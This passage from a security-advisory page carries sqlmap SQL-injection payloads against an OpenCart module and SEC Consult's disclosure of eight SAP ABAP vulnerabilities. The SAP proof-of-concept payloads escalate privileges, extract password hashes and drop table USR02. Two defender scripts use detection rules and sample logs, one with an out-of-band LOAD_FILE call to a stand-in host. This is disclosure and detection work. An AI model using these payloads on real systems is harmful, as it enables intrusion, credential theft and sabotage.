/> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK<br /></code></pre>
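The sqlmap payloads quoted in the advisories above (Online Fire Reporting, CLink Office, FiatExchanger, AltExchanger, OpenCart) are built from a small set of recognisable blocks: `SLEEP(n)`, `FLOOR(RAND(0)*2)` grouped over `INFORMATION_SCHEMA.PLUGINS`, `UNION ALL SELECT NULL,...`, `LOAD_FILE()` with a UNC path, `CASE WHEN ... ELSE (SELECT ... UNION` and the `AND 'xxxx'='xxxx` tail, spread across query string, body and cookie. The detector below is an added example for defenders reviewing reverse-proxy records, not code from any of the advisories; the request records, client addresses and the `oob.example` host are constructed to mirror those payload shapes.

```python
import re
from urllib.parse import unquote_plus

# Detection rules named after the payload building blocks quoted in the advisories
# above; applied to URL-decoded, lower-cased request content.
RULES = [
    ("time_based_sleep", re.compile(r"\bsleep\s*\(\s*\d+\s*\)")),
    ("error_based_floor", re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)")),
    ("schema_probe", re.compile(r"information_schema\.(plugins|tables|columns)")),
    ("union_null_probe", re.compile(r"union\s+(all\s+)?select\s+(null\s*,\s*){2,}")),
    # load_file('\\\\host\\share'): a UNC path here is an out-of-band read attempt
    ("load_file_unc", re.compile(r"load_file\s*\(\s*'\\\\")),
    ("boolean_tail", re.compile(r"\b(and|or)\s+(not\s+)?\d+\s*=\s*\d+")),
    ("quote_tautology", re.compile(r"\b(and|or)\s+'[a-z0-9]{2,8}%?'\s*=\s*'[a-z0-9]{2,8}")),
    ("case_when_union", re.compile(
        r"case\s+when\s*\(.*?\)\s*then\s+\d+\s+else\s*\(\s*select\s+\d+\s+union")),
]


def decode(text):
    """URL-decode twice (scanners often double-encode) and lower-case for matching."""
    return unquote_plus(unquote_plus(text or "")).lower()


def scan_request(record):
    """Return the names of every rule that fires on one request record.

    A record is a dict with 'uri' (path plus query string), 'body' and 'cookie':
    the three injection points used across the advisories above.
    """
    surface = " ".join(decode(record.get(k, "")) for k in ("uri", "body", "cookie"))
    return [name for name, rx in RULES if rx.search(surface)]


def summarize(records):
    """Aggregate hits per client: {client: {'requests': n, 'rules': [...]}}."""
    per_client = {}
    for rec in records:
        hits = scan_request(rec)
        if not hits:
            continue
        entry = per_client.setdefault(rec["client"], {"requests": 0, "rules": set()})
        entry["requests"] += 1
        entry["rules"].update(hits)
    return {c: {"requests": e["requests"], "rules": sorted(e["rules"])}
            for c, e in per_client.items()}


def is_scanner(entry):
    """Three or more distinct rule families from one client is automated tooling
    cycling through techniques, not a single hand-crafted request."""
    return len(entry["rules"]) >= 3


# Constructed reverse-proxy records modelled on the advisories' payload shapes.
# Client addresses are documentation ranges; oob.example stands in for the
# attacker-controlled host of the original LOAD_FILE payload.
SAMPLE_LOG = [
    {"client": "198.51.100.7", "cookie": "", "body": "",
     "uri": r"/index.php?page=reports&date=2022-05-24'+(select load_file('\\\\oob.example\\dvs'))+'' OR NOT 3052=3052 AND 'yrRg'='yrRg"},
    {"client": "198.51.100.7", "cookie": "", "body": "",
     "uri": "/chart_content/master.php/history?from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 1746 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(1746=1746,1))),0x7171627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hIKU'='hIKU"},
    {"client": "203.0.113.9", "uri": "/index.php/home/about", "body": "",
     "cookie": "inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z"},
    {"client": "198.51.100.7", "cookie": "",
     "uri": "/index.php?route=extension/module/zemez_newsletter/addNewsletter",
     "body": "zemez_newsletter_email=saud%25'+AND+4728%3D(SELECT+(CASE+WHEN+(4728%3D4728)+THEN+4728+ELSE+(SELECT+4929+UNION+SELECT+7220)+END))--+-"},
    {"client": "192.0.2.5", "uri": "/index.php?page=reports&date=2022-05-24", "body": "", "cookie": ""},
    {"client": "198.51.100.7", "cookie": "", "body": "",
     "uri": "/index.php?page=reports&date=2022-05-24' UNION ALL SELECT NULL,NULL,NULL,NULL#"},
    {"client": "192.0.2.5", "cookie": "",
     "uri": "/index.php?route=extension/module/zemez_newsletter/addNewsletter",
     "body": "zemez_newsletter_email=alice%40example.com"},
]


if __name__ == "__main__":
    for client, entry in summarize(SAMPLE_LOG).items():
        tag = "SCANNER" if is_scanner(entry) else "suspicious"
        print(f"{client:14s} {tag:10s} requests={entry['requests']} rules={entry['rules']}")
```

The signatures are deliberately narrow so that ordinary text such as "and 10 copies" does not fire; widen them only with a corpus of your own traffic to measure false positives against.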
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220518-0 ><br />=======================================================================<br /> title: Multiple Critical Vulnerabilities<br /> product: SAP® Application Server<br /> ABAP and ABAP® Platform (Different Software Components)<br /> vulnerable version: see section "Vulnerable / tested versions"<br /> fixed version: see SAP security notes 2958563, 2973735,<br /> 2993132, 2986980, 2999854, 3002517, 3048657<br /> CVE number: CVE-2020-6318, CVE-2020-26808, CVE-2020-26832,<br /> CVE-2021-21465, CVE-2021-21468, CVE-2021-21466,<br /> CVE-2021-21473, CVE-2021-33678<br /> impact: critical<br /> homepage: https://www.sap.com<br /> found: 08/2020 - 02/2021<br /> by: Fabian Hagg (Office Vienna)<br /> Alexander Meier (Office Berlin)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"SAP is a market share leader in enterprise resource planning (ERP),<br />analytics, supply chain management, human capital management, master<br />data management, data integration as well as in experience management"<br />[1]. Customers comprise 92% of the Forbes Global 2000 companies and<br />98% of the 100 most valued brands. 77% of the world’s transaction revenue<br />touches an SAP system [1, 2].<br /><br />"SAP NetWeaver Application Server for ABAP (AS ABAP) is a platform on<br />which important business processes run. It provides a complete development<br />and runtime environment for ABAP-based applications. The purpose of AS ABAP<br />is to provide programmers with an efficient means of expressing business<br />logic and relieve them from the necessity of platform-related and purely<br />technical coding. 
AS ABAP is therefore a basis for all ABAP systems" [3].<br /><br />"The [successor] ABAP platform provides a reliable and scalable server<br />and programming environment for modern ABAP development [...]. The ABAP<br />platform offers support for SAP HANA and SAP Fiori and allows developers<br />to efficiently build enterprise software that meets the requirements of<br />their business scenarios – on-premise as well as in the cloud" [4].<br /><br />[1] https://www.sap.com/about/company.html<br />[2] https://www.sap.com/documents/2017/04/4666ecdd-b67c-0010-82c7-eda71af511fa.html<br />[3] https://help.sap.com/viewer/ff18034f08af4d7bb33894c2047c3b71/7.52.5/en-US/797de8aa42e24916953c4bb3d983662d.html<br />[4] https://developers.sap.com/topics/abap-platform.html<br /><br /><br />Business recommendation:<br />------------------------<br />By exploiting the vulnerabilities documented in this advisory, privileged<br />attackers can take complete control of affected application servers. Thus,<br />successful exploitation can enable fraud, sabotage or data theft while<br />affecting confidentiality, integrity, and availability of business data.<br /><br />SEC Consult recommends implementing security notes 2958563, 2973735,<br />2993132, 2986980, 2999854, 3002517 and 3048657, in which the documented<br />issues are fixed according to the vendor. We advise installing the<br />corrections as a matter of priority to keep business-critical data secured.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />Advanced Business Application Programming (ABAP)® is a proprietary<br />programming language by SAP SE. In common with every other programming<br />language, ABAP can be susceptible to software vulnerabilities ranging<br />from missing or improper authorization checks to inadequate input<br />validation and output sanitization.
Of particular concern are injection<br />vulnerabilities, which can jeopardize the overall system security.<br /><br />Remote Function Call (RFC) is a proprietary network protocol by SAP SE.<br />Comparable to application programming interfaces (APIs), SAP systems<br />come with thousands of built-in function modules implemented in ABAP. RFC<br />allows remote-enabled functions to be accessed via the network. This makes<br />it possible to decentralize business applications even across system<br />boundaries. External programs and external clients can make use of RFC<br />connections to interact with an SAP system via libraries (e.g. NW RFC SDK)<br />provisioned by SAP SE.<br /><br />This advisory covers multiple critical vulnerabilities discovered in<br />the ABAP® coding of standard function modules. These are part of different<br />software components that build upon the bedrock products SAP® Application<br />Server ABAP and ABAP® Platform.<br /><br />1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver<br /> (ABAP Server) and ABAP Platform<br /><br /> Function modules RSDU_LIST_DB_TABLE_SYB and RSDU_LIST_DB_TABLE_DB4<br /> of function groups RSDU_UTIL_SYB and RSDU_CORE_UTIL_DB4 are vulnerable<br /> to ABAP code injection bugs that allow execution of arbitrary ABAP<br /> code. Successful exploitation leads to full system compromise.<br /><br />2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP<br /> and S/4 HANA (DMIS)<br /><br /> Function module CNV_MBT_SEL_STRING_RETURN of function group<br /> CNV_MBT_SEL is vulnerable to an ABAP code injection bug that allows<br /> an attacker to embed arbitrary code into the ABAP Repository. 
An attacker can abuse<br /> this bug by invoking the function remotely via the RFC protocol.<br /> Successful exploitation leads to full system compromise.<br /><br />3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver<br /> AS ABAP and SAP S4 HANA (SAP Landscape Transformation)<br /><br /> Function module CNV_GET_USERS_FOR_APP_SERVER of function group<br /> CNV_00001_HELP does not perform any programmatically implemented<br /> authorization check. An attacker can abuse this bug by invoking<br /> the function remotely via the RFC protocol. Successful exploitation<br /> allows an attacker to retrieve internal information and to make a<br /> targeted SAP system completely unavailable to its intended users.<br /> The latter constitutes a Denial of Service (DoS) attack.<br /><br />4) [CVE-2021-21468] Missing Authorization Check in SAP Business<br /> Warehouse (Database Interface)<br /><br /> Function module RSDL_DB_GET_DATA_BWS of function group RSDL does<br /> not perform any programmatically implemented authorization check.<br /> An attacker can abuse this bug by invoking the function remotely<br /> via the RFC protocol. Successful exploitation allows an attacker to<br /> read out the entire database, including cross-client data access.<br /><br />5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP<br /> Business Warehouse (Database Interface)<br /><br /> Function module RSDL_DB_GET_DATA_BWS of function group RSDL is<br /> vulnerable to a native SQL injection (ADBC) bug that allows execution<br /> of arbitrary SQL commands at database level. 
An attacker can abuse<br /> this bug by invoking the function remotely via the RFC protocol.<br /> Successful exploitation leads to full system compromise.<br /><br />6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business<br /> Warehouse and SAP BW/4HANA<br /><br /> Function module RSDRI_DF_TEXT_READ of function group RSDRI_DF_FACADE<br /> is vulnerable to an ABAP code injection bug that allows an attacker<br /> to embed arbitrary code into the ABAP Repository. An attacker can abuse this<br /> bug by invoking the function remotely via the RFC protocol. Successful<br /> exploitation leads to full system compromise.<br /><br />7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP<br /> and ABAP Platform<br /><br /> Function module SRM_RFC_SUBMIT_REPORT of function group SRM_REP does not<br /> enforce proper authorization checks for critical use of a dynamic program<br /> call. An attacker can abuse this bug by invoking the function remotely<br /> via the RFC protocol. Successful exploitation allows an attacker to<br /> execute existing ABAP reports without holding sufficient authorizations.<br /><br />8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP<br /> (Reconciliation Framework)<br /><br /> Function module CONVERT_FROM_CHAR_SORT_RFW of function group FG_RFW contains<br /> a code injection vulnerability with a limited exploitation primitive. An<br /> attacker can abuse this bug to delete critical system tables (e.g. USR02),<br /> making the targeted SAP system completely unavailable to its intended users.<br /><br /><br />Proof of concept:<br />-----------------<br /><br />1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver<br /> (ABAP Server) and ABAP Platform<br /><br /> The vulnerable functions make use of the GENERATE SUBROUTINE POOL<br /> instruction by providing source code that is created dynamically<br /> using untrusted user input. 
As there is no input validation or<br /> output sanitization, an attacker can inject malicious ABAP code<br /> through specific import parameters. This code gets executed on the<br /> fly by the application server in the course of execution of the<br /> functions.<br /><br /> The following payload exploits the bug to escalate privileges via<br /> reference user assignment:<br /><br /> Import Parameter: I_TABLNM<br /> Value: USR02<br /><br /> Import Table: I_T_SELECT_FIELDS<br /> ╒═════════════╕<br /> │ RSD_FIELDNM │<br /> ╞═════════════╡<br /> │ BNAME       │<br /> ╘═════════════╛<br /><br /> Import Table: I_T_WHERE_COND<br /> ╒═════════╤════╤══════════════════════════════════════════╕<br /> │ FIELDNM │ OP │ LOW                                      │<br /> ╞═════════╪════╪══════════════════════════════════════════╡<br /> │ BNAME   │ EQ │ S'ENDEXEC. EXEC SQL.UPDATE USREFUS SET   │<br /> │         │    │ REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER │<br /> ╘═════════╧════╧══════════════════════════════════════════╛<br /><br /><br />2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP<br /> and S/4 HANA (DMIS)<br /><br /> The vulnerable function makes use of the INSERT REPORT instruction<br /> by providing source code that is created dynamically using untrusted<br /> user input. As there is no input validation or output sanitization,<br /> an attacker can inject malicious ABAP code through specific import<br /> parameters. 
Inserted code may be executed by chaining this bug with<br /> CVE-2021-21473.<br /><br /> The following payload exploits the bug to escalate privileges via<br /> reference user assignment:<br /><br /> Import Parameter: TABNAME<br /> Value: USR02<br /><br /> Import Table: IMT_SELSTRING<br /> ╒══════════════════════════════════════════════════════════════╕<br /> │ LINE                                                         │<br /> ╞══════════════════════════════════════════════════════════════╡<br /> │ BNAME = 'TEST'. ENDSELECT.                                   │<br /> ├──────────────────────────────────────────────────────────────┤<br /> │ UPDATE USREFUS SET REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER' │<br /> ├──────────────────────────────────────────────────────────────┤<br /> │ SELECT * FROM USR02                                          │<br /> ╘══════════════════════════════════════════════════════════════╛<br /><br /><br />3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver<br /> AS ABAP and SAP S4 HANA (SAP Landscape Transformation)<br /><br /> The vulnerable function does not perform any explicit authorization<br /> check. Depending on a specific import parameter, the function leaks<br /> active logon sessions (opcode 02) or terminates all active logon<br /> sessions (opcode 25) by kernel call 'ThUsrInfo'. Invoking the function<br /> periodically prevents users from logging into the application server.<br /><br /> The following payload exploits the bug to trigger the information<br /> disclosure and enumerate active user sessions:<br /><br /> Import Parameter: MODE<br /> Value: 1<br /><br /> The following payload exploits the bug to terminate all active user<br /> sessions:<br /><br /> Import Parameter: MODE<br /> Value: 2<br /><br /><br />4) [CVE-2021-21468] Missing Authorization Check in SAP Business<br /> Warehouse (Database Interface)<br /><br /> The vulnerable function does not perform any explicit authorization<br /> check. 
It uses predefined classes and methods from the ABAP Database<br /> Connectivity (ADBC) framework to execute native SQL queries at database<br /> level. Depending on specific import parameters, this allows an attacker<br /> to read out arbitrary table data including user master records or<br /> secure storages (e.g. RSECTAB).<br /><br /> The following payload exploits the bug to exfiltrate user password<br /> hashes:<br /><br /> Import Table: I_S_TABSEL<br /> ╒═══════╕<br /> │ NAME  │<br /> ╞═══════╡<br /> │ USR02 │<br /> ╘═══════╛<br /> Import Table: I_S_DBCON<br /> ╒═════════════════════════════════════════════╕<br /> │ CON_NAME                                    │<br /> ╞═════════════════════════════════════════════╡<br /> │ <Database Connection String> (e.g. DEFAULT) │<br /> ╘═════════════════════════════════════════════╛<br /> Import Table: I_T_DBFIELDS<br /> ╒═══════════════╤═════════╤════════╕<br /> │ NAME          │ TYPE    │ LENGTH │<br /> ╞═══════════════╪═════════╪════════╡<br /> │ BNAME         │ CHAR255 │ 000255 │<br /> ├───────────────┼─────────┼────────┤<br /> │ PWDSALTEDHASH │ CHAR255 │ 000255 │<br /> ╘═══════════════╧═════════╧════════╛<br /><br /><br />5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP<br /> Business Warehouse (Database Interface)<br /><br /> The vulnerable function does not perform any input validation or<br /> output sanitization on import parameters that can be used to define<br /> conditional SQL statements. 
This allows an attacker to inject arbitrary<br /> SQL commands that get executed natively at database level in the<br /> course of execution of the function.<br /><br /> The following payload exploits the bug to escalate privileges via<br /> reference user assignment:<br /><br /> Import Table: I_S_TABSEL<br /> ╒═══════╕<br /> │ NAME  │<br /> ╞═══════╡<br /> │ USR02 │<br /> ╘═══════╛<br /><br /> Import Table: I_S_DBCON<br /> ╒═════════════════════════════════════════════╕<br /> │ CON_NAME                                    │<br /> ╞═════════════════════════════════════════════╡<br /> │ <Database Connection String> (e.g. DEFAULT) │<br /> ╘═════════════════════════════════════════════╛<br /><br /> Import Table: I_T_DBFIELDS<br /> ╒═══════════════╤═════════╤════════╕<br /> │ NAME          │ TYPE    │ LENGTH │<br /> ╞═══════════════╪═════════╪════════╡<br /> │ BNAME         │ CHAR255 │ 000255 │<br /> ╘═══════════════╧═════════╧════════╛<br /><br /> Import Table: I_T_SELECT<br /> ╒═══════════════════════╤════════╤═══════════════════════════════╕<br /> │ FIELDNM               │ OPTION │ LOW                           │<br /> ╞═══════════════════════╪════════╪═══════════════════════════════╡<br /> │ BNAME                 │ EQ     │ '';UPDATE USREFUS SET REFUSER │<br /> │                       │        │ ='DDIC' WHERE '1              │<br /> ├───────────────────────┼────────┼───────────────────────────────┤<br /> │ ' = '1 AND' AND BNAME │ EQ     │ 'ATTACKER';                   │<br /> ╘═══════════════════════╧════════╧═══════════════════════════════╛<br /><br /><br />6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business<br /> Warehouse and SAP BW/4HANA<br /><br /> The vulnerable function makes use of the INSERT REPORT instruction<br /> by providing source code that is created dynamically using untrusted<br /> user input. 
As there is no input validation or output sanitization,<br /> an attacker can inject malicious ABAP code through specific import<br /> parameters. Inserted code may be executed by chaining this bug with<br /> CVE-2021-21473.<br /><br /> The following payload exploits the bug to escalate privileges via<br /> reference user assignment:<br /><br /> Import Parameter: I_TABLE_NAME<br /> Value: INJECTION<br /><br /> Import Parameter: I_DEBUG_SUFFIX<br /> Value: SAP<br /><br /> Import Table: I_T_RANGE_STRING<br /> ╒═══════╤══════════════════════════════════╤════════════╕<br /> │ CHANM │ LOW                              │ HIGH       │<br /> ╞═══════╪══════════════════════════════════╪════════════╡<br /> │ BNAME │ '. UPDATE USREFUS SET REFUSER    │ '. EXIT. " │<br /> │       │ = 'DDIC' WHERE BNAME = 'ATTACKER │            │<br /> ╘═══════╧══════════════════════════════════╧════════════╛<br /><br /><br />7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP<br /> and ABAP Platform<br /><br /> The vulnerable function uses a dynamically generated program name (based<br /> on data from untrusted sources) in a SUBMIT call. No authorization checks<br /> are programmatically enforced. Thus, a remote, unauthorized attacker can<br /> leverage this function to start any existing ABAP report by providing the<br /> respective report name in the import parameter REPORTNAME.<br /><br /><br />8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP<br /> (Reconciliation Framework)<br /><br /> The vulnerable function makes use of the GENERATE SUBROUTINE POOL instruction<br /> in form 'get_dynamic_fields' by providing source code that is created<br /> dynamically using untrusted user input. As there is no input validation or<br /> output sanitization, an attacker can inject malicious ABAP code through specific<br /> import parameters. These parameters are limited in size due to their variable<br /> type. This restricts an attacker in exploitation scenarios. 
However, it is still<br /> possible, for example, to delete critical system tables by exploiting this bug.<br /><br /> The following payload exploits the bug to drop table USR02, leading to a complete<br /> loss of availability of the target system:<br /><br /> Import Parameter: RTABNAME<br /> Value: X. EXEC SQL. DROP TABLE USR02-<br /><br /> Import Parameter: RFIELDNAME<br /> Value: ENDEXEC<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />All tests were conducted on SAP NetWeaver Application Server ABAP 752 SP04<br />and ABAP Platform 1909. No additional testing on other releases has been<br />carried out. According to the vendor the following releases and versions<br />are affected by the discovered vulnerabilities:<br /><br />1) SAP NetWeaver (ABAP Server) and ABAP Platform, Versions<br /> - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752,<br /> 753, 754, 755<br /> Components: SAP_BW, SAP_BW_VIRTUAL_COMP<br /><br />2) SAP AS ABAP (DMIS), Versions - 2011_1_620, 2011_1_640,<br /> 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752,<br /> 2020; SAP S4 HANA(DMIS), Versions - 101, 102, 103, 104, 105<br /> Components: DMIS, S4CORE<br /><br />3) SAP NetWeaver AS ABAP (SAP Landscape Transformation - DMIS),<br /> Versions - 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710,<br /> 2011_1_730, 2011_1_731, 2011_1_752, 2020; SAP S4 HANA<br /> (SAP Landscape Transformation), Versions - 101, 102, 103,<br /> 104, 105<br /> Components: DMIS, S4CORE<br /><br />4) SAP Business Warehouse, Versions - 710, 711, 730, 731, 740,<br /> 750, 751, 752, 753, 754, 755, 782<br /> Components: SAP_BW, SAP_BW_VIRTUAL_COMP<br /><br />5) SAP Business Warehouse, Versions - 710, 711, 730, 731, 740,<br /> 750, 751, 752, 753, 754, 755, 782<br /> Components: SAP_BW, SAP_BW_VIRTUAL_COMP<br /><br />6) SAP Business Warehouse, Versions - 700, 701, 702, 711, 730,<br /> 731, 740, 750, 782; SAP BW4HANA, Versions - 100, 200<br /> Components: SAP_BW, DW4CORE<br 
/><br />7) SAP NetWeaver AS ABAP and ABAP Platform, Versions - 700,<br /> 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755<br /> Components: SAP_BASIS<br /><br />8) SAP NetWeaver AS ABAP (Reconciliation Framework) - 700, 701,<br /> 702, 710, 711, 730, 731, 740, 750, 751, 752, 75A, 75B, 75B,<br /> 75C, 75D, 75E, 75F<br /> Components: SAP_ABA<br /><br /><br />Vendor contact timeline:<br />------------------------<br />The following timelines have been split for each CVE/vulnerability, as different<br />contacts were responsible. All identified vulnerabilities have been fixed by now<br />by SAP and SEC Consult releases this security advisory adhering to the<br />responsible disclosure policy.<br /><br /><br />CVE-2020-6318<br />--------------------------------<br />2020-08-12 | Contacting vendor with detailed report through vulnerability<br /> submission web form.<br />2020-08-13 | Vendor confirms receipt and assigns security incident number<br /> #2080354772.<br />2020-08-19 | Vendor confirms vulnerability.<br />2020-08-24 | Vendor informs about patch development strategy.<br />2020-09-07 | Vendor informs about release of the patch, registration of CVE<br /> number and corresponding security note.<br />2020-09-08 | Vendor releases patch with SAP Security Note 2958563.<br /><br /><br />CVE-2020-26808<br />--------------------------------<br />2020-09-24 | Contacting vendor with detailed report through vulnerability<br /> submission web form.<br />2020-09-25 | Vendor confirms receipt and assigns security incident number<br /> #2070354293.<br />2020-10-20 | Contacting vendor to request progress information.<br />2020-10-21 | Vendor confirms vulnerability and states that a fix is in<br /> development.<br />2020-11-09 | Vendor informs about release of the patch, registration of CVE<br /> number and corresponding security note.<br />2020-11-10 | Vendor releases patch with SAP Security Note 2973735.<br /><br /><br />CVE-2020-26832<br 
/>--------------------------------<br />2020-10-23 | Contacting vendor with detailed report through vulnerability<br /> submission web form.<br />2020-10-26 | Vendor confirms receipt and assigns security incident number<br /> #2070432866.<br />2020-11-17 | Vendor confirms vulnerability and proposes CVSS score of 7.6.<br />2020-11-23 | Vendor asks for exploit script shown in the initial report.<br />2020-11-24 | Providing the requested script via encrypted PGP mail.<br />2020-12-07 | Vendor informs about release of the patch, registration of CVE<br /> number and corresponding security note.<br />2020-12-08 | Vendor releases patch with SAP Security Note 2993132.<br /><br /><br />CVE-2021-21465 / CVE-2021-21468<br />--------------------------------<br />2020-10-27 | Contacting vendor with detailed report through vulnerability<br /> submission web form.<br />2020-10-29 | Vendor confirms receipt and assigns separate security incident<br /> numbers #2070446047 and #2070446050.<br />2020-11-06 | Vendor confirms vulnerability and predicts patches to be released<br /> on December Patch Tuesday 2020.<br />2020-11-18 | Vendor confirms that they are still on track for December Patch<br /> Tuesday 2020.<br />2020-12-01 | Vendor informs that the patch needs to be postponed to January Patch<br /> Tuesday 2021.<br />2021-01-08 | Vendor informs about release of patches and clarifies that a single<br /> security note will fix both issues. 
Additional information about<br /> CVSS scores is provided.<br />2021-01-11 | Vendor informs about release of the patches, registration of CVE<br /> numbers and corresponding security note.<br />2021-01-12 | Vendor releases patches with SAP Security Note 2986980.<br /><br /><br />CVE-2021-21466 / CVE-2021-21473<br />--------------------------------<br />2020-11-25 | Contacting vendor with detailed report through vulnerability<br /> submission web form.<br />2020-11-27 | Vendor confirms receipt and assigns security incident number<br /> #2080396648.<br />2021-01-04 | Vendor confirms vulnerability and states that they are working<br /> on a fix. Additional information is provided detailing that<br /> they will split the reported finding into two separate security<br /> issues with security incident numbers #2080396648 and #2080412695.<br />2021-01-11 | Vendor informs about release of the first patch, registration of CVE<br /> number and corresponding security note.<br />2021-01-11 | Vendor informs about patch release for the first issue. 
Additional<br /> information is provided describing that a patch for the second issue<br /> is still in development.<br />2021-01-12 | Vendor releases first patch with SAP Security Note 2999854.<br />2021-05-07 | Asking vendor for update regarding the second issue.<br />2021-05-11 | Vendor informs that the fix is in progress and the note will be released soon.<br />2021-06-07 | Vendor informs about release of the second patch, registration of CVE<br /> number and corresponding security note.<br />2021-06-08 | Vendor releases second patch with SAP Security Note 3002517.<br /><br /><br />CVE-2021-33678<br />--------------------------------<br />2021-02-01 | Contacting vendor with detailed report through vulnerability<br /> submission web form.<br />2021-02-03 | Vendor confirms receipt and assigns security incident number<br /> #2180074995.<br />2021-05-07 | Asking vendor for update.<br />2021-05-11 | Vendor informs that the fix is in progress.<br />2021-07-12 | Vendor informs about release of the patch, registration of CVE<br /> number and corresponding security note.<br />2021-07-13 | Vendor releases patch with SAP Security Note 3048657.<br /><br /><br />Solution:<br />---------<br />SAP SE reacted promptly to our findings. Product Security Incident Response<br />Team (PSRT) and engineers released patches in a timely manner for each of<br />the reported issues. These patches are available in the form of SAP Security<br />Notes, which can be accessed via the SAP Customer Launchpad [5]. 
More<br />information can also be found at the Official SAP Product Security Response<br />Space [6].<br /><br />The following Security Notes need to be implemented:<br /><br />2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657<br /><br />[5] https://launchpad.support.sap.com/#/securitynotes<br />[6] https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF F. Hagg, A. 
Meier / @2022<br /><br /></code></pre>
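<p>Defender-side triage of RFC call records against the function modules named in the advisory above, as an added example (not SEC Consult's or SAP's code): it flags calls to the listed modules, exact references to the tables the payloads touch, and parameter values that carry ABAP/SQL statement fragments where a table or field name is expected. The JSON-lines log format, the user names and the Z_CONSTRUCTED_REPORT module are constructed for the example; a real SAP Security Audit Log or gateway log needs its own parser.</p>

```python
"""Triage RFC call records against the function modules named in the
SEC Consult advisory (added example; not SEC Consult or SAP code).
The JSON-lines format parsed here is constructed for this example."""
import json
import re
from dataclasses import dataclass

# Function modules from the advisory, mapped to the CVE(s) that cover them.
VULNERABLE_FUNCTION_MODULES = {
    "RSDU_LIST_DB_TABLE_SYB": "CVE-2020-6318",
    "RSDU_LIST_DB_TABLE_DB4": "CVE-2020-6318",
    "CNV_MBT_SEL_STRING_RETURN": "CVE-2020-26808",
    "CNV_GET_USERS_FOR_APP_SERVER": "CVE-2020-26832",
    "RSDL_DB_GET_DATA_BWS": "CVE-2021-21468 / CVE-2021-21465",
    "RSDRI_DF_TEXT_READ": "CVE-2021-21466",
    "SRM_RFC_SUBMIT_REPORT": "CVE-2021-21473",
    "CONVERT_FROM_CHAR_SORT_RFW": "CVE-2021-33678",
}

# Tables the advisory's payloads touch; an exact reference is worth a look.
SENSITIVE_TABLES = {"USR02", "USREFUS", "RSECTAB"}

# A table or field name is a short uppercase identifier. Values that do not
# fit this shape AND contain a statement fragment show the advisory's pattern:
# ABAP/SQL smuggled into a parameter meant to hold a name.
DDIC_NAME = re.compile(r"^[A-Z0-9_/]{1,30}$")
STATEMENT_FRAGMENT = re.compile(
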